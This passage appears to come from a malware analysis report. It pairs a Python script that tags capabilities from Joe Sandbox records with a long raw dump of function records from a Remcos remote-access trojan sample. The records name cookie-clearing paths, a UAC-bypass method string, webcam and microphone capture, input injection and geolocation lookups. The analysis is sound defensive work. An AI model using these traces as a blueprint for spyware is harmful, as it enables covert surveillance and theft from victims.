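        tags.add("sysinfo-via-dxdiag")
    if any(a.startswith("waveIn") for a in apis):
        tags.add("audio-capture")
    if apis & {"RegEnumKeyExW", "RegEnumValueW"}:
        tags.add("registry-enumeration")
    if {"WriteFile", "MoveFileW"} <= apis and ".part" in strs:
        tags.add("file-download-rename")
    if "SendInput" in apis:
        tags.add("input-injection")
    if "Shell_NotifyIconA" in apis:
        tags.add("tray-icon")
    if any(s.startswith(("[+] NtAllocateVirtualMemory", "PEB:")) for s in strs):
        tags.add("injection-debug-strings")
    return tags


def triage(text: str) -> dict[str, set[str]]:
    """Map each record's Instruction ID prefix to its inferred capabilities."""
    return {rec.label: capabilities(rec) for rec in parse_records(text)}


# Abbreviated copy of three records from this report's listing (arg lists shortened).
SAMPLE = r"""
APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003), ref: 0041C49E
• Sleep.KERNEL32(00000064), ref: 00417521
• DeleteFileW.KERNEL32(00000000), ref: 00417555
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
• Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
• Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
• waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
• waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
• waveInStart.WINMM ref: 00401CFE
• String ID: dMG$|MG$PG
• Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
• Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002), ref: 004079C5
• WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 00407A4D
• MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
• DeleteFileW.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00407AA5
• String ID: .part
• Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
• Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
"""

if __name__ == "__main__":
    for label, tags in triage(SAMPLE).items():
        print(label, sorted(tags))
```

Run against the full listing, the parser turns several thousand lines of records into a capability map per function; the subcall filter matters because Joe Sandbox lists callee APIs under the caller, which would otherwise make every function that reaches the network look like a downloader.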
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                        • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                        • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                        • __freea.LIBCMT ref: 0044AE30
                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                        • __freea.LIBCMT ref: 0044AE39
                                        • __freea.LIBCMT ref: 0044AE5E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                        • String ID:
                                        • API String ID: 3864826663-0
                                        • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                        • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                        • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                        • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                        APIs
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                        • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: InputSend
                                        • String ID:
                                        • API String ID: 3431551938-0
                                        • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                        • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                        • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                        • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: __freea$__alloca_probe_16_free
                                        • String ID: a/p$am/pm$zD
                                        • API String ID: 2936374016-2723203690
                                        • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                        • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                        • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                        • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                        APIs
                                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: Enum$InfoQueryValue
                                        • String ID: [regsplt]$xUG$TG
                                        • API String ID: 3554306468-1165877943
                                        • Opcode ID: c89703c452742340ff60579caf23f853db4314ddae31bb61f668ab7a5683df1c
                                        • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                        • Opcode Fuzzy Hash: c89703c452742340ff60579caf23f853db4314ddae31bb61f668ab7a5683df1c
                                        • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                        APIs
                                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                        • __fassign.LIBCMT ref: 0044B479
                                        • __fassign.LIBCMT ref: 0044B494
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                                        • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                        • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                        • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                        • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: _free
                                        • String ID: D[E$D[E
                                        • API String ID: 269201875-3695742444
                                        • Opcode ID: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                                        • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                        • Opcode Fuzzy Hash: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                                        • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                          • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                          • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: CloseEnumInfoOpenQuerysend
                                        • String ID: xUG$NG$NG$TG
                                        • API String ID: 3114080316-2811732169
                                        • Opcode ID: 78b4761bafa789b7ec0324fc523b2a0aab5d4531e2e1c5ea0475fcb8cdd1609c
                                        • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                        • Opcode Fuzzy Hash: 78b4761bafa789b7ec0324fc523b2a0aab5d4531e2e1c5ea0475fcb8cdd1609c
                                        • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                        APIs
                                          • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                          • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                          • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                        • _wcslen.LIBCMT ref: 0041B763
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                        • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                        • API String ID: 37874593-122982132
                                        • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                        • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                        • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                        • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                        APIs
                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                          • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                        • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                        • API String ID: 1133728706-4073444585
                                        • Opcode ID: 59f5114bd6e2efbc69d05e513e653785be42e7b7fbf21b675d61eac15074141f
                                        • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                        • Opcode Fuzzy Hash: 59f5114bd6e2efbc69d05e513e653785be42e7b7fbf21b675d61eac15074141f
                                        • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                        • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                        • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                        • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                        APIs
                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                        Strings
                                        • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: Internet$CloseHandleOpen$FileRead
                                        • String ID: http://geoplugin.net/json.gp
                                        • API String ID: 3121278467-91888290
                                        • Opcode ID: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
                                        • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                        • Opcode Fuzzy Hash: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
                                        • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                        APIs
                                          • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                        • _free.LIBCMT ref: 00450F48
                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                        • _free.LIBCMT ref: 00450F53
                                        • _free.LIBCMT ref: 00450F5E
                                        • _free.LIBCMT ref: 00450FB2
                                        • _free.LIBCMT ref: 00450FBD
                                        • _free.LIBCMT ref: 00450FC8
                                        • _free.LIBCMT ref: 00450FD3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                        • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                        • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                        • int.LIBCPMT ref: 00411183
                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                        • std::_Facet_Register.LIBCPMT ref: 004111C3
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                        • String ID: (mG
                                        • API String ID: 2536120697-4059303827
                                        • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                        • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                        • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                        • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                        APIs
                                        • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                        • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                        • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                        • Opcode Fuzzy Hash: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                        • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                        APIs
                                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 004075D0
                                          • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                          • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                        • CoUninitialize.OLE32 ref: 00407629
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: InitializeObjectUninitialize_wcslen
                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                        • API String ID: 3851391207-3324213274
                                        • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                        • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                        • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                        • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                        APIs
                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                        • GetLastError.KERNEL32 ref: 0040BAE7
                                        Strings
                                        • UserProfile, xrefs: 0040BAAD
                                        • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                        • [Chrome Cookies not found], xrefs: 0040BB01
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: DeleteErrorFileLast
                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                        • API String ID: 2018770650-304995407
                                        • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                        • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                        • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                        • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                        APIs
                                        • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                        • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: Console$AllocOutputShowWindow
                                        • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                        • API String ID: 2425139147-3065609815
                                        • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                        • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                        • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                        • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                        APIs
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                        • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                        • Sleep.KERNEL32(00002710), ref: 0041AE07
                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                        • String ID: Alarm triggered$`#v
                                        • API String ID: 614609389-3049340936
                                        • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                        • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                        • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                        • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                        APIs
                                        • __allrem.LIBCMT ref: 0043AC69
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                        • __allrem.LIBCMT ref: 0043AC9C
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                        • __allrem.LIBCMT ref: 0043ACD1
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                        • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                        • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                        • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                        APIs
                                        • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                          • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: H_prologSleep
                                        • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                        • API String ID: 3469354165-3054508432
                                        • Opcode ID: 7c33d7a2f0fbcfc682037ee12da25bfab69272e7d38e6870219f47a5674dbce2
                                        • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                        • Opcode Fuzzy Hash: 7c33d7a2f0fbcfc682037ee12da25bfab69272e7d38e6870219f47a5674dbce2
                                        • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                        APIs
                                          • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                        • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                        • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
